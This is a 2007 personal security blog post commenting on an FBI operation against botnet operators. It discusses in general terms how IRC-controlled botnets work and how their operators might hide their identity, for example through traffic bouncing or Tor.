« Shared phone conference numbers | Main | Update »

Bot roast and how easy it is to not get caught

If you like it here, please consider subscribing to the RSS feed or spreading the news among your friends who also care about security.

About two months ago FBI announced that they have charged or arrested three, as they like to call them, bot-herders. They are accused of being in control of botnets, infecting user PCs, sending spam, and issuing DDoS attacks. We’ll see what comes out of it and if they are found guilty or not, but what’s interesting about it, is how did the FBI get to them in the first place?

The traditional way of commandeering the botnet is to have all bots to connect to an IRC channel and to issue commands to this channel. The main idea behind it is that it allows all the bots to listen without a herder directly connecting to them. Also, the tricky part hear is that it’s nearly impossible to tell the master and the puppets apart, before the commands are issued (i.e. when bots are just reporting whatever they have to report).

On the other hand, when commands are being issued, it gets fairly clear who is the actual boss. It may take a lot of effort to reverse engineer the code of the bot, but it’s doable and one may finally work out which machine on the IRC channel is giving orders.

But. Knowing which user it is, does not necessarily give us much in terms of who the person really is. There is like a gazillion ideas about how to anonymise yourself in the net, especially when you control like a couple of thousands of hosts (or hundreds of thousands as it appears to be the case sometimes). You can bounce the communication back and forth, make it appear to originate from innocent hosts, when possible communicate using connectionless protocols spoofing IPs, making sure the communication goes through many different countries (hostile to each other preferably) and so on. Like you name it, the list goes on and on. And once you commandeer a botnet all of it is pretty easy to do.

And I didn’t even mention the easiest possible solution. Nearly free as in money and effort, wrapped in a nice shiny cellophane and home delivered — TOR (The Onion Routing).

The idea behind the TOR is to allow average users to maintain a reasonable level of anonymity when surfing the web and performing other privacy-sensitive operations on the net. Like, well, say ircing, as there are IRC networks trying to provide normal access for the torified clients.

OK, it may not give a military-grade privacy, but sure enough adds to anonymity and would make it harder to track a bot-herder down. So, something to think about — is it more likely that FBI have gone beyond anonymity improving solution like this, or maybe it’s that they’ve caught these guys, because they didn’t take care about enough anonymity when issuing commands to their botnets.

I guess we’ll find out soon enough.

Posted by Michał Sobiegraj on August 19, 2007 2:34 PM | | Digg It

TrackBack

TrackBack URL for this entry:
http://sobiegraj.com/blog/mt-tb.cgi/42

Post a comment

(If you haven't left a comment here before, you may need to be approved by the site owner before your comment will appear. Until then, it won't appear on the entry. Thanks for waiting.)

© 2006-2007 Michał Sobiegraj. All rights reserved. The views expressed here are my own, and not necessarily endorsed by any former or current employer.

Search


About

This page contains a single entry from the blog posted on August 19, 2007 2:34 PM.

The previous post in this blog was Shared phone conference numbers.

The next post in this blog is Update.

Many more can be found on the main index page or by looking through the archives.

Subscribe to this blog's feed
[What is this?]
Powered by
Movable Type 3.34